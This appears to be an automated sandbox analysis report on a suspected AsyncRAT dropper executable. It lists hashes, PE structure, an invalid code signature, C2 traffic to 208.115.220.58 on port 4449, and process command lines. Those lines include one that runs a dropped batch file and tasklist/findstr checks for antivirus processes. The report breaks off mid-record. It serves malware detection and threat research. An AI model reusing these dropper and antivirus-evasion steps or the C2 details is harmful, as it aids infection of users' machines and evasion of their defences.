                                                                                              SHA512:fec9ed7257466d44055aefbe378f40a9f5066a83b82efe4fbd4bcb9cb3dc447732e7e523d3e47893db35538f80ba358d70d1529da1c16316b709aca10f3d2f10
                                                                                              SSDEEP:98304:Z/4qyVBXdPfPtPuIao7/+GsQCx9w4zpkcYy:5TyVRvmNQVqPw41kcYy
                                                                                              TLSH:E3F53385DE6F0560DCAA163557B0E6F79BA87E75B4F6C81BFB680C88FC02B53001895B
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...D...B...8.....

                                                                                              File Icon

                                                                                              Icon Hash:faf8fcb8dae2619d

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4038af
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                              Authenticode Signature

                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                              Error Number:-2146869232
                                                                                              Not Before, Not After
                                                                                              • 04/01/2022 19:00:00 04/01/2025 18:59:59
                                                                                              Subject Chain
                                                                                              • CN=SOFTLAND SRL, O=SOFTLAND SRL, S=Cluj, C=RO, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=RO, SERIALNUMBER=J12 /1244 /1999
                                                                                              Version:3
                                                                                              Thumbprint MD5:9D25F2B10785AEEE8FBC7D491B79A6B0
                                                                                              Thumbprint SHA-1:FE2887ED7C7BCF13BCDDE7B55B83B5C96DC8738B
                                                                                              Thumbprint SHA-256:4FE58F27A3C4EA858D3EACBF3DE2E6C44F40F0650D8163C938DAC6865D979262
                                                                                              Serial:00A7AB1CBE1100EAF792D7F8E8BD6D365E

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              sub esp, 000002D4h
                                                                                              push ebx
                                                                                              push ebp
                                                                                              push esi
                                                                                              push edi
                                                                                              push 00000020h
                                                                                              xor ebp, ebp
                                                                                              pop esi
                                                                                              mov dword ptr [esp+18h], ebp
                                                                                              mov dword ptr [esp+10h], 0040A268h
                                                                                              mov dword ptr [esp+14h], ebp
                                                                                              call dword ptr [00409030h]
                                                                                              push 00008001h
                                                                                              call dword ptr [004090B4h]
                                                                                              push ebp
                                                                                              call dword ptr [004092C0h]
                                                                                              push 00000008h
                                                                                              mov dword ptr [0047EB98h], eax
                                                                                              call 00007F0880E3976Bh
                                                                                              push ebp
                                                                                              push 000002B4h
                                                                                              mov dword ptr [0047EAB0h], eax
                                                                                              lea eax, dword ptr [esp+38h]
                                                                                              push eax
                                                                                              push ebp
                                                                                              push 0040A264h
                                                                                              call dword ptr [00409184h]
                                                                                              push 0040A24Ch
                                                                                              push 00476AA0h
                                                                                              call 00007F0880E3944Dh
                                                                                              call dword ptr [004090B0h]
                                                                                              push eax
                                                                                              mov edi, 004CF0A0h
                                                                                              push edi
                                                                                              call 00007F0880E3943Bh
                                                                                              push ebp
                                                                                              call dword ptr [00409134h]
                                                                                              cmp word ptr [004CF0A0h], 0022h
                                                                                              mov dword ptr [0047EAB8h], eax
                                                                                              mov eax, edi
                                                                                              jne 00007F0880E36D3Ah
                                                                                              push 00000022h
                                                                                              pop esi
                                                                                              mov eax, 004CF0A2h
                                                                                              push esi
                                                                                              push eax
                                                                                              call 00007F0880E39111h
                                                                                              push eax
                                                                                              call dword ptr [00409260h]
                                                                                              mov esi, eax
                                                                                              mov dword ptr [esp+1Ch], esi
                                                                                              jmp 00007F0880E36DC3h
                                                                                              push 00000020h
                                                                                              pop ebx
                                                                                              cmp ax, bx
                                                                                              jne 00007F0880E36D3Ah
                                                                                              add esi, 02h
                                                                                              cmp word ptr [esi], bx

                                                                                              Rich Headers

                                                                                              Programming Language:
                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000xd326.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x33904b0x2f18
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x1000000xd3260xd4002872b4606189d0dfc05c5a3c50c6c98bFalse0.8658055719339622data7.473909168801405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x10e0000xfd60x1000b402b3676bd396508c38754d9cce3fbcFalse0.598876953125data5.586604019934863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x1002500x6adePNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00003655237956
                                                                                              RT_ICON0x106d300x245fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011813983460423
                                                                                              RT_ICON0x1091900x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5751627339300244
                                                                                              RT_ICON0x10b7f80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6329690346083788
                                                                                              RT_ICON0x10c9200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7774822695035462
                                                                                              RT_DIALOG0x10cd880x100dataEnglishUnited States0.5234375
                                                                                              RT_DIALOG0x10ce880x11cdataEnglishUnited States0.6056338028169014
                                                                                              RT_DIALOG0x10cfa40x60dataEnglishUnited States0.7291666666666666
                                                                                              RT_GROUP_ICON0x10d0040x4cdataEnglishUnited States0.8026315789473685
                                                                                              RT_MANIFEST0x10d0500x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                              Imports

                                                                                              DLLImport
                                                                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-12T12:39:15.665492+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)1208.115.220.584449192.168.2.749843TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 12, 2024 12:39:14.182585001 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:14.302377939 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:14.305768967 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:14.314723969 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:14.434544086 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:15.538697004 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:15.545587063 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:15.665492058 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:15.934345007 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:15.988464117 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:19.136265039 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:19.256191969 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:19.257369995 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:19.377209902 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:29.427133083 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:29.546922922 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:29.546998024 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:29.666707993 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:29.935029030 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:29.988523006 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:30.126957893 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:30.134375095 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:30.254499912 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:30.254650116 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:30.374413967 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:39.724359035 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:39.844106913 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:39.844225883 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:39.963977098 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:40.243812084 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:40.285521984 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:40.434616089 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:40.436976910 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:40.556679964 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:40.556734085 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:40.676493883 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:50.020348072 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:50.140135050 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:50.140337944 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:50.260185957 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:50.528508902 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:50.582355976 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:50.721716881 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:50.727823019 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:50.847690105 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:39:50.848129034 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:39:50.968400002 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:00.317343950 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:00.437181950 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:00.437235117 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:00.557804108 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:00.824667931 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:00.879273891 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:01.018521070 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:01.066838980 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:01.095571995 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:01.215836048 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:01.215904951 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:01.336230993 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:10.614283085 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:10.734122992 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:10.734332085 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:10.854139090 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:11.123089075 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:11.176301003 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:11.315006018 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:11.349971056 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:11.469816923 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:11.469954967 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:11.591176033 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.129893064 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:19.249972105 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.250375032 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:19.370377064 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.643337965 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.692018032 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:19.835167885 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.836205959 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:19.956022978 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.956141949 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:20.076083899 CET444949843208.115.220.58192.168.2.7

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 12, 2024 12:38:06.671679020 CET5005153192.168.2.71.1.1.1
                                                                                              Dec 12, 2024 12:38:18.941162109 CET6008953192.168.2.71.1.1.1
                                                                                              Dec 12, 2024 12:38:19.175452948 CET53600891.1.1.1192.168.2.7

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 12, 2024 12:38:06.671679020 CET192.168.2.71.1.1.10x897dStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:18.941162109 CET192.168.2.71.1.1.10x8563Standard query (0)iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYeA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 12, 2024 12:38:06.809098959 CET1.1.1.1192.168.2.70x897dNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:09.798491001 CET1.1.1.1192.168.2.70x175cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:09.798491001 CET1.1.1.1192.168.2.70x175cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:19.175452948 CET1.1.1.1192.168.2.70x8563Name error (3)iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYenonenoneA (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:31.718424082 CET1.1.1.1192.168.2.70xb2e9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:31.718424082 CET1.1.1.1192.168.2.70xb2e9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:48.503556013 CET1.1.1.1192.168.2.70xd065No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:38:48.503556013 CET1.1.1.1192.168.2.70xd065No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:39:16.156339884 CET1.1.1.1192.168.2.70xc0d8No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 12, 2024 12:39:16.156339884 CET1.1.1.1192.168.2.70xc0d8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:39:16.156339884 CET1.1.1.1192.168.2.70xc0d8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:39:16.156339884 CET1.1.1.1192.168.2.70xc0d8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                              Dec 12, 2024 12:39:16.156339884 CET1.1.1.1192.168.2.70xc0d8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false

                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:06:38:10
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\OR8Ti8rf8h.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:3'391'331 bytes
                                                                                              MD5 hash:6681713C421E1B4951D5A08C39F43E97
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:06:38:12
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd
                                                                                              Imagebase:0x410000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:06:38:12
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff75da10000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:06:38:14
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:tasklist
                                                                                              Imagebase:0xee0000
                                                                                              File size:79'360 bytes
                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:06:38:14
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr /I "wrsa opssvc"
                                                                                              Imagebase:0x1e0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:06:38:15
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:tasklist
                                                                                              Imagebase:0xee0000
                                                                                              File size:79'360 bytes
                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:06:38:15
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                              Imagebase:0x1e0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:06:38:16
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd /c md 585711
                                                                                              Imagebase:0x410000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:06:38:16
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight
                                                                                              Imagebase:0x1e0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:10
                                                                                              Start time:06:38:16
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
